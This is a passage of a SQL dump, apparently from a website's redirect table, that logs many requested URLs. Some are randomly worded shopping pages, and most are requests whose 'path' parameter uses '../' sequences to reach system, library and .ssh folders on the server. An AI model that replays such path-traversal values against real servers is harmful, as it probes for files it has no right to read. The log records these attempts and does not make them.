00:00:00',301),(79764,'https://3s-technologies.com.tr/tr/shopping/betray/4025267599.html',NULL,'https://3s-technologies.com.tr/shopping/betray/4025267599.html','',1,0,'2026-06-11 23:02:33','0000-00-00 00:00:00',301),(79765,'https://3s-technologies.com.tr/tr/shopping/amblyopsis/1561239670.html',NULL,'https://3s-technologies.com.tr/shopping/amblyopsis/1561239670.html','',1,0,'2026-06-11 23:02:36','0000-00-00 00:00:00',301),(79766,'https://3s-technologies.com.tr/tr/shopping/hyacinthine/165529545.html',NULL,'https://3s-technologies.com.tr/shopping/hyacinthine/165529545.html','',1,0,'2026-06-11 23:02:39','0000-00-00 00:00:00',301),(79767,'https://3s-technologies.com.tr/tr/shopping/mulctary/1959102909.html',NULL,'https://3s-technologies.com.tr/shopping/mulctary/1959102909.html','',1,0,'2026-06-11 23:02:42','0000-00-00 00:00:00',301),(79768,'https://3s-technologies.com.tr/tr/shopping/muzarab/2151771498.html',NULL,'https://3s-technologies.com.tr/shopping/muzarab/2151771498.html','',1,0,'2026-06-11 23:02:45','0000-00-00 00:00:00',301),(79769,'https://3s-technologies.com.tr/tr/shopping/lutestring/1089655304.html',NULL,'https://3s-technologies.com.tr/shopping/lutestring/1089655304.html','',1,0,'2026-06-11 23:02:48','0000-00-00 00:00:00',301),(79770,'https://3s-technologies.com.tr/tr/shopping/smeath/3827151958.html',NULL,'https://3s-technologies.com.tr/shopping/smeath/3827151958.html','',1,0,'2026-06-11 23:02:51','0000-00-00 00:00:00',301),(79771,'https://3s-technologies.com.tr/tr/shopping/tetradonta/1607011857.html',NULL,'https://3s-technologies.com.tr/shopping/tetradonta/1607011857.html','',1,0,'2026-06-11 23:02:54','0000-00-00 00:00:00',301),(79772,'https://3s-technologies.com.tr/tr/shopping/alliteral/3857993273.html',NULL,'https://3s-technologies.com.tr/shopping/alliteral/3857993273.html','',1,0,'2026-06-11 23:02:58','0000-00-00 00:00:00',301),(79773,'https://3s-technologies.com.tr/tr/shopping/tanak/2459883573.html',NULL,'https://3s-technologies.com.tr/shopping/tanak/2459883573.html','',1,0,'2026-06-11 23:03:00','0000-00-00 00:00:00',301),(79774,'https://3s-technologies.com.tr/tr/shopping/deducible/1808578703.html',NULL,'https://3s-technologies.com.tr/shopping/deducible/1808578703.html','',1,0,'2026-06-11 23:03:04','0000-00-00 00:00:00',301),(79775,'https://3s-technologies.com.tr/tr/shopping/cacodyle/2159996583.html',NULL,'https://3s-technologies.com.tr/shopping/cacodyle/2159996583.html','',1,0,'2026-06-11 23:03:06','0000-00-00 00:00:00',301),(79776,'https://3s-technologies.com.tr/tr/shopping/alalia/1340015727.html',NULL,'https://3s-technologies.com.tr/shopping/alalia/1340015727.html','',1,0,'2026-06-11 23:03:09','0000-00-00 00:00:00',301),(79777,'https://3s-technologies.com.tr/tr/shopping/elizabeth/1916084165.html',NULL,'https://3s-technologies.com.tr/shopping/elizabeth/1916084165.html','',1,0,'2026-06-11 23:03:13','0000-00-00 00:00:00',301),(79778,'https://3s-technologies.com.tr/tr/shopping/trachomatous/1583510574.html',NULL,'https://3s-technologies.com.tr/shopping/trachomatous/1583510574.html','',1,0,'2026-06-11 23:03:15','0000-00-00 00:00:00',301),(79779,'https://3s-technologies.com.tr/tr/shopping/idolatrize/2727952134.html',NULL,'https://3s-technologies.com.tr/shopping/idolatrize/2727952134.html','',1,0,'2026-06-11 23:03:19','0000-00-00 00:00:00',301),(79780,'https://3s-technologies.com.tr/tr/shopping/trichobranchia/2817440460.html',NULL,'https://3s-technologies.com.tr/shopping/trichobranchia/2817440460.html','',1,0,'2026-06-11 23:03:24','0000-00-00 00:00:00',301),(79781,'https://3s-technologies.com.tr/tr/shopping/hilled/4202798922.html',NULL,'https://3s-technologies.com.tr/shopping/hilled/4202798922.html','',1,0,'2026-06-11 23:03:28','0000-00-00 00:00:00',301),(79782,'https://3s-technologies.com.tr/tr/shopping/peabody/2671107533.html',NULL,'https://3s-technologies.com.tr/shopping/peabody/2671107533.html','',1,0,'2026-06-11 23:03:57','0000-00-00 00:00:00',301),(79783,'https://3s-technologies.com.tr/tr/shopping/tractate/508854786.html',NULL,'https://3s-technologies.com.tr/shopping/tractate/508854786.html','',1,0,'2026-06-11 23:04:26','0000-00-00 00:00:00',301),(79784,'https://3s-technologies.com.tr/tr/shopping/governance/2778585174.html',NULL,'https://3s-technologies.com.tr/shopping/governance/2778585174.html','',1,0,'2026-06-11 23:04:31','0000-00-00 00:00:00',301),(79785,'https://3s-technologies.com.tr/tr/shopping/recitation/2281327177.html',NULL,'https://3s-technologies.com.tr/shopping/recitation/2281327177.html','',1,0,'2026-06-11 23:05:31','0000-00-00 00:00:00',301),(79786,'https://3s-technologies.com.tr/tr/shopping/bassetto/232175663.html',NULL,'https://3s-technologies.com.tr/shopping/bassetto/232175663.html','',1,0,'2026-06-11 23:05:39','0000-00-00 00:00:00',301),(79787,'https://3s-technologies.com.tr/tr/shopping/birthplace/3210397608.html',NULL,'https://3s-technologies.com.tr/shopping/birthplace/3210397608.html','',1,0,'2026-06-11 23:06:43','0000-00-00 00:00:00',301),(79788,'https://3s-technologies.com.tr/tr/shopping/sacerdotalism/266641994.html',NULL,'https://3s-technologies.com.tr/shopping/sacerdotalism/266641994.html','',1,0,'2026-06-11 23:07:00','0000-00-00 00:00:00',301),(79789,'https://3s-technologies.com.tr/tr/shopping/bumblepuppy/1386309992.html',NULL,'https://3s-technologies.com.tr/shopping/bumblepuppy/1386309992.html','',1,0,'2026-06-11 23:07:16','0000-00-00 00:00:00',301),(79790,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/enchant/../lua/../python3.6',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fenchant%2F..%2Flua%2F..%2Fpython3.6','',1,0,'2026-06-24 18:40:26','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (79791,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python3.12/../python2.7/timeit.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython3.12%2F..%2Fpython2.7%2Ftimeit.py','',1,0,'2026-06-24 18:40:26','0000-00-00 00:00:00',301),(79792,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/demo/scripts',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2FDemo%2Fscripts','',1,0,'2026-06-24 18:40:27','0000-00-00 00:00:00',301),(79793,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/sse2/../python3.12/../python2.7/whichdb.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsse2%2F..%2Fpython3.12%2F..%2Fpython2.7%2Fwhichdb.pyc','',1,0,'2026-06-24 18:40:27','0000-00-00 00:00:00',301),(79794,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/device-mapper/../php/../python3.12/xml/../../python3.6/secrets.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fdevice-mapper%2F..%2Fphp%2F..%2Fpython3.12%2Fxml%2F..%2F..%2Fpython3.6%2Fsecrets.py','',1,0,'2026-06-24 18:40:28','0000-00-00 00:00:00',301),(79795,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python3.6/pty.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython3.6%2Fpty.py','',1,0,'2026-06-24 18:40:28','0000-00-00 00:00:00',301),(79796,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/telnetlib.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Ftelnetlib.pyc','',1,0,'2026-06-24 18:40:29','0000-00-00 00:00:00',301),(79797,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/bsddb',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fbsddb','',1,0,'2026-06-24 18:40:30','0000-00-00 00:00:00',301),(79798,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../../groff/../python2.7/stringio.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2F..%2Fgroff%2F..%2Fpython2.7%2FStringIO.py','',1,0,'2026-06-24 18:40:31','0000-00-00 00:00:00',301),(79799,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../mysqlclient/../multipath/../python3.12/difflib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fmultipath%2F..%2Fpython3.12%2Fdifflib.py','',1,0,'2026-06-24 18:40:32','0000-00-00 00:00:00',301),(79800,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/zipfile.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Fzipfile.py','',1,0,'2026-06-24 18:40:33','0000-00-00 00:00:00',301),(79801,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../tls/../python2.7/contextlib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Ftls%2F..%2Fpython2.7%2Fcontextlib.py','',1,0,'2026-06-24 18:40:34','0000-00-00 00:00:00',301),(79802,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/.wp-cli/../../../dev/../dev/../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2F.wp-cli%2F..%2F..%2F..%2Fdev%2F..%2Fdev%2F..%2F.','',1,0,'2026-06-24 18:40:35','0000-00-00 00:00:00',301),(79803,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/logging/../../python3.6/html',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Flogging%2F..%2F..%2Fpython3.6%2Fhtml','',1,0,'2026-06-24 18:40:36','0000-00-00 00:00:00',301),(79804,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../bind/../python3.6/cmd.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fbind%2F..%2Fpython3.6%2Fcmd.py','',1,0,'2026-06-24 18:40:37','0000-00-00 00:00:00',301),(79805,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/.wp-cli/../../../../usr/include/python3.12/../ncursesw',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2F.wp-cli%2F..%2F..%2F..%2F..%2Fusr%2Finclude%2Fpython3.12%2F..%2Fncursesw','',1,0,'2026-06-24 18:40:38','0000-00-00 00:00:00',301),(79806,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python3.6/selectors.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython3.6%2Fselectors.py','',1,0,'2026-06-24 18:40:39','0000-00-00 00:00:00',301),(79807,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/logging/../../python3.12',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Flogging%2F..%2F..%2Fpython3.12','',1,0,'2026-06-24 18:40:40','0000-00-00 00:00:00',301),(79808,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../python3.12/../python3.6/posixpath.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fpython3.12%2F..%2Fpython3.6%2Fposixpath.py','',1,0,'2026-06-24 18:40:41','0000-00-00 00:00:00',301),(79809,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/man/../../include/python3.6m/node.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fman%2F..%2F..%2Finclude%2Fpython3.6m%2Fnode.h','',1,0,'2026-06-24 18:40:42','0000-00-00 00:00:00',301),(79810,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/pickle.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2Fpickle.py','',1,0,'2026-06-24 18:40:43','0000-00-00 00:00:00',301),(79811,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/ldb/../gconv/../python3.12/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fldb%2F..%2Fgconv%2F..%2Fpython3.12%2F..','',1,0,'2026-06-24 18:40:44','0000-00-00 00:00:00',301),(79812,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/rpm-plugins/../python3.6/logging/..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Frpm-plugins%2F..%2Fpython3.6%2Flogging%2F..','',1,0,'2026-06-24 18:40:45','0000-00-00 00:00:00',301),(79813,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/urlparse.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Furlparse.pyo','',1,0,'2026-06-24 18:40:46','0000-00-00 00:00:00',301),(79814,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../mysqlclient/../sa/../python3.12/difflib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fsa%2F..%2Fpython3.12%2Fdifflib.py','',1,0,'2026-06-24 18:40:47','0000-00-00 00:00:00',301),(79815,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/multipath/../apache2/../python2.7/xml',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fmultipath%2F..%2Fapache2%2F..%2Fpython2.7%2Fxml','',1,0,'2026-06-24 18:40:48','0000-00-00 00:00:00',301),(79816,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../lua/../python2.7/rexec.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Flua%2F..%2Fpython2.7%2Frexec.py','',1,0,'2026-06-24 18:40:49','0000-00-00 00:00:00',301),(79817,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/python3.6/logging/../../libproxy',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fpython3.6%2Flogging%2F..%2F..%2Flibproxy','',1,0,'2026-06-24 18:40:50','0000-00-00 00:00:00',301),(79818,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../mysqlclient/../python2.7/../python3.12/imaplib.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fmysqlclient%2F..%2Fpython2.7%2F..%2Fpython3.12%2Fimaplib.py','',1,0,'2026-06-24 18:40:51','0000-00-00 00:00:00',301),(79819,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../tls/../python2.7/tools/../genericpath.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Ftls%2F..%2Fpython2.7%2FTools%2F..%2Fgenericpath.pyc','',1,0,'2026-06-24 18:40:52','0000-00-00 00:00:00',301),(79820,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/gnupg/../python-cllib/../.././..',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fgnupg%2F..%2Fpython-cllib%2F..%2F..%2F.%2F..','',1,0,'2026-06-24 18:40:53','0000-00-00 00:00:00',301),(79821,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/linux/../python3.6m/../pcrecpparg.h',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2Flinux%2F..%2Fpython3.6m%2F..%2Fpcrecpparg.h','',1,0,'2026-06-24 18:40:55','0000-00-00 00:00:00',301),(79822,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/concurrent/../../games',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fconcurrent%2F..%2F..%2Fgames','',1,0,'2026-06-24 18:40:56','0000-00-00 00:00:00',301),(79823,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/x11/../apache2/../python2.7/../python3.6/__pycache__',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2FX11%2F..%2Fapache2%2F..%2Fpython2.7%2F..%2Fpython3.6%2F__pycache__','',1,0,'2026-06-24 18:40:57','0000-00-00 00:00:00',301),(79824,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/gnupg/../python-cllib/../../../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fgnupg%2F..%2Fpython-cllib%2F..%2F..%2F..%2F.','',1,0,'2026-06-24 18:40:58','0000-00-00 00:00:00',301),(79825,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/asyncio/../../.',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fasyncio%2F..%2F..%2F.','',1,0,'2026-06-24 18:40:58','0000-00-00 00:00:00',301),(79826,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/share/vim/vimfiles/../../../bin/ghostscript',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Fshare%2Fvim%2Fvimfiles%2F..%2F..%2F..%2Fbin%2Fghostscript','',1,0,'2026-06-24 18:41:00','0000-00-00 00:00:00',301),(79827,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../python3.12/concurrent/../../redis',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fpython3.12%2Fconcurrent%2F..%2F..%2Fredis','',1,0,'2026-06-24 18:41:01','0000-00-00 00:00:00',301),(79828,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/copy.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fcopy.pyc','',1,0,'2026-06-24 18:41:02','0000-00-00 00:00:00',301),(79829,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../lua/../python2.7/site.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Flua%2F..%2Fpython2.7%2Fsite.py','',1,0,'2026-06-24 18:41:02','0000-00-00 00:00:00',301),(79830,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../../bind/../libpython2.7.so',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2F..%2Fbind%2F..%2Flibpython2.7.so','',1,0,'2026-06-24 18:41:04','0000-00-00 00:00:00',301),(79831,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/../xtables/../python2.7/string.pyo',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2F..%2Fxtables%2F..%2Fpython2.7%2Fstring.pyo','',1,0,'2026-06-24 18:41:05','0000-00-00 00:00:00',301),(79832,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../gssproxy/../python2.7/xml/../pprint.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Fgssproxy%2F..%2Fpython2.7%2Fxml%2F..%2Fpprint.py','',1,0,'2026-06-24 18:41:06','0000-00-00 00:00:00',301),(79833,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.6/json/../../python2.7/subprocess.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.6%2Fjson%2F..%2F..%2Fpython2.7%2Fsubprocess.py','',1,0,'2026-06-24 18:41:07','0000-00-00 00:00:00',301),(79834,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../www/../../../../../run',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2Fwww%2F..%2F..%2F..%2F..%2F..%2Frun','',1,0,'2026-06-24 18:41:08','0000-00-00 00:00:00',301),(79835,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/gio/../libuser/../python3.12/http/../code.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fgio%2F..%2Flibuser%2F..%2Fpython3.12%2Fhttp%2F..%2Fcode.py','',1,0,'2026-06-24 18:41:09','0000-00-00 00:00:00',301),(79836,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../apache2/.././python3.6/__pycache__',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fapache2%2F..%2F.%2Fpython3.6%2F__pycache__','',1,0,'2026-06-24 18:41:10','0000-00-00 00:00:00',301),(79837,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python3.6/dis.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython3.6%2Fdis.py','',1,0,'2026-06-24 18:41:10','0000-00-00 00:00:00',301),(79838,'https://3s-technologies.com.tr/tr/91534?path=/home/../usr/lib64/php/../python2.7/json/../crypt.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Fusr%2Flib64%2Fphp%2F..%2Fpython2.7%2Fjson%2F..%2Fcrypt.py','',1,0,'2026-06-24 18:41:11','0000-00-00 00:00:00',301),(79839,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python2.7/py_compile.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython2.7%2Fpy_compile.py','',1,0,'2026-06-24 18:41:12','0000-00-00 00:00:00',301),(79840,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../usr/include/../include/python2.7/../bsock',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Fusr%2Finclude%2F..%2Finclude%2Fpython2.7%2F..%2Fbsock','',1,0,'2026-06-24 18:41:12','0000-00-00 00:00:00',301),(79841,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/libibverbs/../python3.6/../python2.7/../python2.7/sre.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flibibverbs%2F..%2Fpython3.6%2F..%2Fpython2.7%2F..%2Fpython2.7%2Fsre.py','',1,0,'2026-06-24 18:41:13','0000-00-00 00:00:00',301),(79842,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/../apache2/.././python3.12/json',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2Fapache2%2F..%2F.%2Fpython3.12%2Fjson','',1,0,'2026-06-24 18:41:13','0000-00-00 00:00:00',301),(79843,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/../.cl.selector/../../../../bin/../../../opt',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2F..%2F.cl.selector%2F..%2F..%2F..%2F..%2Fbin%2F..%2F..%2F..%2Fopt','',1,0,'2026-06-24 18:41:14','0000-00-00 00:00:00',301),(79844,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/php/.././apache2/../python3.12/json',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fphp%2F..%2F.%2Fapache2%2F..%2Fpython3.12%2Fjson','',1,0,'2026-06-24 18:41:15','0000-00-00 00:00:00',301),(79845,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../php/docs/../../ssl/../.httprequest/../.ssh/../cache',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2Fphp%2Fdocs%2F..%2F..%2Fssl%2F..%2F.HttpRequest%2F..%2F.ssh%2F..%2Fcache','',1,0,'2026-06-24 18:41:16','0000-00-00 00:00:00',301),(79846,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/lua/../apache2/../bind/../python3.6/threading.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Flua%2F..%2Fapache2%2F..%2Fbind%2F..%2Fpython3.6%2Fthreading.py','',1,0,'2026-06-24 18:41:17','0000-00-00 00:00:00',301),(79847,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../fipscheck/../python3.6/../python3.6/getopt.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Ffipscheck%2F..%2Fpython3.6%2F..%2Fpython3.6%2Fgetopt.py','',1,0,'2026-06-24 18:41:18','0000-00-00 00:00:00',301),(79848,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/samba/../gssproxy/../python2.7/logging/../difflib.pyc',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Fsamba%2F..%2Fgssproxy%2F..%2Fpython2.7%2Flogging%2F..%2Fdifflib.pyc','',1,0,'2026-06-24 18:41:19','0000-00-00 00:00:00',301),(79849,'https://3s-technologies.com.tr/tr/91534?path=/home/../lib64/fwupd-plugins-5/../python3.12/../php/../python3.6/site.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2F..%2Flib64%2Ffwupd-plugins-5%2F..%2Fpython3.12%2F..%2Fphp%2F..%2Fpython3.6%2Fsite.py','',1,0,'2026-06-24 18:41:20','0000-00-00 00:00:00',301),(79850,'https://3s-technologies.com.tr/tr/91534?path=/home/ledbazaa/var/../../../lib64/python3.12/re/../tkinter/../../python3.6/socketserver.py',NULL,'https://3s-technologies.com.tr/91534/?path=%2Fhome%2Fledbazaa%2Fvar%2F..%2F..%2F..%2Flib64%2Fpython3.12%2Fre%2F..%2Ftkinter%2F..%2F..%2Fpython3.6%2Fsocketserver.py','',1,0,'2026-06-24 18:41:21','0000-00-00 